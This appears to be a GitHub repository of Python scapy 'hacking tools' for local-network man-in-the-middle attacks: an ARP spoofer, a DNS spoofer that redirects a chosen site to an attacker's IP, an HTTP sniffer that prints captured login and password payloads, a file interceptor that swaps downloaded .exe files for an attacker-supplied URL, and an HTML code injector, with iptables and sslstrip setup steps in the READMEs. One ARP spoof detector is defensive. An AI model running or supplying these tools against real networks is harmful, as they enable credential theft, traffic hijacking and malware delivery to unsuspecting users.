├── .gitignore ├── arp_spoofing ├── __init__.py ├── README.MD └── arp_spoofing.py ├── network_scanner ├── __init__.py ├── README.MD └── network_scanner.py ├── packet_sniffer ├── __init__.py ├── README.MD └── packet_sniffer.py ├── arp_spoof_detector ├── __init__.py ├── README.MD └── arp_spoof_detector.py ├── requirements.txt ├── .travis.yml ├── README.MD ├── dns_spoof ├── README.MD └── dns_spoof.py ├── code_injector ├── README.MD └── code_injector.py ├── file_interceptor ├── README.MD └── file_interceptor.py └── LICENSE /.gitignore: -------------------------------------------------------------------------------- 1 | venv 2 | .vscode -------------------------------------------------------------------------------- /arp_spoofing/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /network_scanner/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /packet_sniffer/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /arp_spoof_detector/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | flake8 2 | coveralls 3 | scapy -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "3.6" 4 | install: 5 | - pip install -r requirements.txt 6 | script: 7 | - flake8 . 8 | after_success: 9 | - coveralls -------------------------------------------------------------------------------- /arp_spoof_detector/README.MD: -------------------------------------------------------------------------------- 1 | # arp_spoof_detector 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Run script 6 | `python arp_spoof_detector.py -i eth0` 7 | 8 | Run script with --help to get help 9 | `python arp_spoof_detector.py --help` -------------------------------------------------------------------------------- /arp_spoofing/README.MD: -------------------------------------------------------------------------------- 1 | # arp_spoofing 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Run script 6 | `python arp_spoofing.py -t target_ip -g gateway_ip` 7 | 8 | Run script with --help to get help 9 | `python arp_spoofing.py --help` -------------------------------------------------------------------------------- /network_scanner/README.MD: -------------------------------------------------------------------------------- 1 | # network_scanner 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Run script 6 | `python network_scanner.py -t IP or IP range` 7 | 8 | Run script with --help to get help 9 | `python network_scanner.py --help` -------------------------------------------------------------------------------- /packet_sniffer/README.MD: -------------------------------------------------------------------------------- 1 | # arp_spoofing 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Install scupy_http 6 | `pip install scapy_http` 7 | * Run script 8 | `python packet_sniffer.py -i eth0` 9 | 10 | Run script with --help to get help 11 | `python packet_sniffer.py --help` -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # hacking-tools 2 | [![Build Status](https://travis-ci.org/Infectsoldier/hacking_tools.svg?branch=master)](https://travis-ci.org/Infectsoldier/hacking_tools) 3 | [![Coverage Status](https://coveralls.io/repos/github/Infectsoldier/hacking_tools/badge.svg?branch=master)](https://coveralls.io/github/Infectsoldier/hacking_tools?branch=master) 4 | -------------------------------------------------------------------------------- /dns_spoof/README.MD: -------------------------------------------------------------------------------- 1 | # dns-spoofind 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Install netfilterqueue 6 | `pip install netfilterqueue` 7 | * Create queue 8 | `iptables -I FORWARD -j NFQUEUE --queue-num 0` 9 | * Run arp spoofing script 10 | `python arp_spoofing.py -t target_ip -g gateway_ip` 11 | * Run dns_spoofing script 12 | `python dns_spoofing` 13 | 14 | Run script with --help to get help 15 | `python dns_spoofing.py --help` 16 | -------------------------------------------------------------------------------- /code_injector/README.MD: -------------------------------------------------------------------------------- 1 | # code_injector 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Install netfilterqueue 6 | `pip install netfilterqueue` 7 | * Create queue 8 | `iptables -I INPUT -j NFQUEUE --queue-num 0` 9 | `iptables -I OUTPUT -j NFQUEUE --queue-num 0` 10 | * Enable port redirecting 11 | `iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000` 12 | * Start sslstrip 13 | `sslstip` 14 | * Run arp spoofing script 15 | `python arp_spoofing.py -t target_ip -g gateway_ip` 16 | * Run dns_spoofing script 17 | `python code_injector.py -u url_with_file` 18 | 19 | Run script with --help to get help 20 | `python code_injector.py --help` 21 | -------------------------------------------------------------------------------- /file_interceptor/README.MD: -------------------------------------------------------------------------------- 1 | # file_interceptor 2 | 3 | * Install scupy 4 | `pip install scapy` 5 | * Install netfilterqueue 6 | `pip install netfilterqueue` 7 | * Create queue 8 | `iptables -I INPUT -j NFQUEUE --queue-num 0` 9 | `iptables -I OUTPUT -j NFQUEUE --queue-num 0` 10 | * Enable port redirecting 11 | `iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000` 12 | * Start sslstrip 13 | `sslstip` 14 | * Run arp spoofing script 15 | `python arp_spoofing.py -t target_ip -g gateway_ip` 16 | * Run dns_spoofing script 17 | `python file_interceptor.py -u url_with_file` 18 | 19 | Run script with --help to get help 20 | `python file_interceptor.py --help` 21 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Maksym Postument 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /network_scanner/network_scanner.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import argparse 3 | 4 | 5 | def get_arguments(): 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument("-t", "--target", dest="target", 8 | help="Target IP/IP Range") 9 | options = parser.parse_args() 10 | return options 11 | 12 | 13 | def scan(ip): 14 | arp_request = scapy.ARP(pdst=ip) 15 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 16 | arp_request_broadcast = broadcast/arp_request 17 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, 18 | verbose=False)[0] 19 | 20 | clients_list = [] 21 | for element in answered_list: 22 | client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} 23 | clients_list.append(client_dict) 24 | return clients_list 25 | 26 | 27 | def print_result(results_list): 28 | print("IP\t\t\tMAC Address") 29 | print("----------------------------------------------------") 30 | for client in results_list: 31 | print(client["ip"] + "\t\t" + client["mac"]) 32 | 33 | 34 | options = get_arguments() 35 | scan_result = scan(options.target) 36 | print_result(scan_result) 37 | -------------------------------------------------------------------------------- /arp_spoof_detector/arp_spoof_detector.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import argparse 3 | 4 | 5 | def get_arguments(): 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument("-i", "--interface", dest="interface", 8 | help="Interface name") 9 | options = parser.parse_args() 10 | return options 11 | 12 | 13 | def get_mac(ip): 14 | arp_request = scapy.ARP(pdst=ip) 15 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 16 | arp_request_broadcast = broadcast/arp_request 17 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, 18 | verbose=False)[0] 19 | return answered_list[0][1].hwsrc 20 | 21 | 22 | def sniff_packet(interface): 23 | scapy.sniff(iface=interface, store=False, prn=process_packets) 24 | 25 | 26 | def process_packets(packet): 27 | if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op == 2: 28 | try: 29 | real_mac = get_mac(packet[scapy.ARP].psrc) 30 | responce_mac = packet[scapy.ARP].hwsrc 31 | 32 | if real_mac != responce_mac: 33 | print("You are under attack!") 34 | except IndexError: 35 | pass 36 | 37 | 38 | options = get_arguments() 39 | sniff_packet(options.interface) 40 | -------------------------------------------------------------------------------- /dns_spoof/dns_spoof.py: -------------------------------------------------------------------------------- 1 | import netfilterqueue 2 | import scapy.all as scapy 3 | import argparse 4 | 5 | 6 | def get_arguments(): 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("-w", "--website", dest="website", 9 | help="Website url") 10 | parser.add_argument("-i", "--ip-address", dest="ip", 11 | help="Hacker IP address") 12 | options = parser.parse_args() 13 | return options 14 | 15 | 16 | def spoof_packet(packet): 17 | options = get_arguments() 18 | dns_packet = scapy.IP(packet.get_payload()) 19 | if dns_packet.haslayer(scapy.DNSRR): 20 | qname = dns_packet[scapy.DNSQR].qname 21 | if options.website in qname: 22 | dns_responce = scapy.DNSRR(rrname=qname, rdata=options.ip) 23 | dns_packet[scapy.DNS].an = dns_responce 24 | dns_packet[scapy.DNS].ancount = 1 25 | 26 | del dns_packet[scapy.IP].len 27 | del dns_packet[scapy.IP].chksum 28 | del dns_packet[scapy.UDP].len 29 | del dns_packet[scapy.UDP].chksum 30 | 31 | packet.set_payload(str(dns_packet)) 32 | packet.accept() 33 | 34 | 35 | queue = netfilterqueue.NetfilterQueue() 36 | queue.bind(0, spoof_packet) 37 | queue.run() 38 | -------------------------------------------------------------------------------- /packet_sniffer/packet_sniffer.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | from scapy_http import http 3 | import argparse 4 | 5 | 6 | def get_arguments(): 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("-i", "--interface", dest="interface", 9 | help="Interface name") 10 | options = parser.parse_args() 11 | return options 12 | 13 | 14 | def sniff_packet(interface): 15 | scapy.sniff(iface=interface, store=False, prn=process_packets) 16 | 17 | 18 | def get_url(packet): 19 | return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 20 | 21 | 22 | def get_credentials(packet): 23 | if packet.haslayer(scapy.Raw): 24 | load = packet[scapy.Raw].load 25 | keywords = ["login", "password", "username", "user", "pass"] 26 | for keyword in keywords: 27 | if keyword in load: 28 | return load 29 | 30 | 31 | def process_packets(packet): 32 | if packet.haslayer(http.HTTPRequest): 33 | url = get_url(packet) 34 | print("[+] Http Request >> " + url) 35 | credentials = get_credentials(packet) 36 | if credentials: 37 | print("[+] Possible username/passowrd " + credentials + "\n\n") 38 | 39 | 40 | options = get_arguments() 41 | sniff_packet(options.interface) 42 | -------------------------------------------------------------------------------- /file_interceptor/file_interceptor.py: -------------------------------------------------------------------------------- 1 | import netfilterqueue 2 | import scapy.all as scapy 3 | import argparse 4 | from urlparse import urlparse 5 | 6 | ack_list = [] 7 | 8 | 9 | def get_arguments(): 10 | parser = argparse.ArgumentParser() 11 | parser.add_argument("-u", "--url", dest="url", 12 | help="url to exe file") 13 | options = parser.parse_args() 14 | return options 15 | 16 | 17 | def change_payload(packet, url): 18 | packet[scapy.Raw].load = """HTTP/1.1 301 Moved Permanently 19 | Location: {}\n""".format(url) 20 | del packet[scapy.IP].len 21 | del packet[scapy.IP].chksum 22 | del packet[scapy.TCP].chksum 23 | return packet 24 | 25 | 26 | def replace_file(packet): 27 | options = get_arguments() 28 | parsed_url = urlparse(options.url) 29 | http_packet = scapy.IP(packet.get_payload()) 30 | if http_packet.haslayer(scapy.Raw): 31 | if http_packet[scapy.TCP].dport == 10000: 32 | if ".exe" in http_packet[scapy.Raw].load and \ 33 | parsed_url.netloc not in http_packet[scapy.Raw].load: 34 | print("[+] exe requested") 35 | ack_list.append(http_packet[scapy.TCP].ack) 36 | elif http_packet[scapy.TCP].sport == 10000: 37 | if http_packet[scapy.TCP].seq in ack_list: 38 | ack_list.remove(http_packet[scapy.TCP].seq) 39 | print("Replacing file") 40 | hacked_packet = change_payload(http_packet, options.url) 41 | packet.set_payload(str(hacked_packet)) 42 | packet.accept() 43 | 44 | 45 | queue = netfilterqueue.NetfilterQueue() 46 | queue.bind(0, replace_file) 47 | queue.run() 48 | -------------------------------------------------------------------------------- /code_injector/code_injector.py: -------------------------------------------------------------------------------- 1 | import netfilterqueue 2 | import scapy.all as scapy 3 | import re 4 | import argparse 5 | 6 | 7 | def get_arguments(): 8 | parser = argparse.ArgumentParser() 9 | parser.add_argument("-u", "--url", dest="url", 10 | help="url to exe file") 11 | options = parser.parse_args() 12 | return options 13 | 14 | 15 | def change_payload(packet, load): 16 | packet[scapy.Raw].load = load 17 | del packet[scapy.IP].len 18 | del packet[scapy.IP].chksum 19 | del packet[scapy.TCP].chksum 20 | return packet 21 | 22 | 23 | def inject_code(packet): 24 | http_packet = scapy.IP(packet.get_payload()) 25 | if http_packet.haslayer(scapy.Raw): 26 | load = http_packet[scapy.Raw].load 27 | if http_packet[scapy.TCP].dport == 10000: 28 | load = re.sub("Accept-Encoding:.*?\\r\\n", "", load) 29 | load = load.replace("HTTP/1.1", "HTTP/1.0") 30 | elif http_packet[scapy.TCP].sport == 10000: 31 | injection_code = """""" 33 | load = load.replace("", injection_code + "") 34 | length_search = re.search("(?:Content-Length:\s)(\d*)", load) 35 | if length_search and "text/html" in load: 36 | length = length_search.group(1) 37 | new_length = int(length) + len(injection_code) 38 | load = load.replace(length, str(new_length)) 39 | 40 | if load != http_packet[scapy.Raw].load: 41 | new_packet = change_payload(http_packet, load) 42 | packet.set_payload(str(new_packet)) 43 | packet.accept() 44 | 45 | 46 | queue = netfilterqueue.NetfilterQueue() 47 | queue.bind(0, inject_code) 48 | queue.run() 49 | -------------------------------------------------------------------------------- /arp_spoofing/arp_spoofing.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import time 3 | import argparse 4 | 5 | 6 | def get_arguments(): 7 | parser = argparse.ArgumentParser() 8 | parser.add_argument("-t", "--target", dest="target", 9 | help="Target IP") 10 | parser.add_argument("-g", "--gateway", dest="gateway", 11 | help="Gateway IP") 12 | options = parser.parse_args() 13 | return options 14 | 15 | 16 | # Get target mac address using ip address 17 | def get_mac(ip): 18 | arp_request = scapy.ARP(pdst=ip) 19 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 20 | arp_request_broadcast = broadcast/arp_request 21 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, 22 | verbose=False)[0] 23 | return answered_list[0][1].hwsrc 24 | 25 | 26 | # Change mac address in arp table 27 | def spoof(target_ip, spoof_ip): 28 | target_mac = get_mac(target_ip) 29 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, 30 | psrc=spoof_ip) 31 | scapy.send(packet, verbose=False) 32 | 33 | 34 | # Restore mac address in arp table 35 | def restore(dest_ip, source_ip): 36 | dest_mac = get_mac(dest_ip) 37 | source_mac = get_mac(source_ip) 38 | packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, 39 | psrc=source_ip, hwsrc=source_mac) 40 | scapy.send(packet, count=4, verbose=False) 41 | 42 | 43 | options = get_arguments() 44 | sent_packets_count = 0 45 | try: 46 | while True: 47 | spoof(options.target, options.gateway) 48 | spoof(options.gateway, options.target) 49 | sent_packets_count += 2 50 | print(f"\r[+] Packets sent: {sent_packets_count}", end="") 51 | time.sleep(2) 52 | except KeyboardInterrupt: 53 | print("\nCTRL+C pressed .... Reseting ARP tables. Please wait") 54 | restore(options.target, options.gateway) 55 | restore(options.gateway, options.target) 56 | print("\nARP table restored. Quiting") 57 | --------------------------------------------------------------------------------